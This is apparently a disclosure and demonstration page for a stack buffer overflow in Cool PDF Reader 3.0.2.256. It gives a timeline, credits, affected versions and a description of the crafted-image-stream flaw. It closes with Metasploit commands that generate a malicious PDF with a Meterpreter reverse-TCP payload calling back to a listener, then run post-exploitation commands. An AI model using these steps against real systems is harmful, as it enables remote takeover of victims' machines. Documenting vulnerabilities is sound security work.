Timeline :
Vulnerability discovered and reported to Secunia by Francis Provencher the 2012-12-19
Vulnerability publicly disclosed by Francis Provencher the 2013-01-18
Metasploit PoC provided the 2013-03-17
PoC provided by :
Francis Provencher
Chris Gabriel
juan vazquez
Reference(s) :
Affected version(s) :
Cool PDF Reader equal or prior to version 3.0.2.256
Tested on Windows XP Pro SP3 with :
Cool PDF Reader 3.0.2.256
Description :
This module exploits a stack buffer overflow in Cool PDF Reader equal or prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.
Commands :
use exploit/windows/fileformat/coolpdf_image_stream_bof set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit -j sysinfo getuid